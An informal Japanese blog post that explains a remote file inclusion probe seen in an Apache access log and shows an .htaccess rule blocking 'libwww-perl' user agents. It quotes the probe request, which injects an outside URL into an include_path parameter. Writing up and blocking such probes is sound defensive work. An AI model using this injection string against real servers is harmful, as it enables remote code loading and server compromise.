|
|
まずわ、 log をご覧あれ。
| www763.sakura.ne.jp - - [04/Nov/2008:12:37:57 +0900] "GET //?include_path=http://not-network.com/idscan9?? HTTP/1.1" 200 2037 "-" "libwww-perl/5.805" |
この GET リクエストは、
何が目的なのか良く解らない。
GET リクエストに怪しげな URL を仕込んであるけど、期待するレスポンスが帰ってくるかどーかチェックしているモヨウ。
具体的に何がしたいのかは不明でつが、宜しくない事の踏み台にできるかどーかチェックしているのだらぅと推測しておりマス。
国内はもとより、 .ru とか .de とかからもくるし、そのスジでわ、有名な perl スクリプトなのでしょうね。
気がつかないウチに踏み台にされるのもアツいので早めに拒否してませう。
User-Agent: を見ると、 "libwww-perl/5.805" になっている場合が多いモヨウ。
User-Agent で拒否設定をする場合、悪意のない perl スクリプトによるアクセスも拒否してしまいまつので、留意しておきませう。
拒否の仕方は、単純に User-Agent に "libwww-perl/5.805" が入ってたら deny れす。
"5.805" の Ver No. のとこは、他の No の場合もあるよ。
書き込むファイルは、 httpd.conf でも .htaccess でもどちらでも良かろう。
通信のスループット重視なら、 httpd.conf のほうが良いでしょうし、利便性重視なら .htaccess ってことで。
下記の記述の一例は、.htaccess に書く場合でつ。 httpd.conf の場合も同様に。
|
SetEnvIf User-Agent "^libwww" deny_ua Order Allow,Deny Allow from All Deny from env=deny_ua |
あとは、時々 access_log を見て、 http status code 403 をレスポンスしているのを確認してくらさい。
httpd status code で 200 をレスポンスしているようだと、 拒否できてないぞよ。
その場合は、記述内容を良く確認してね。
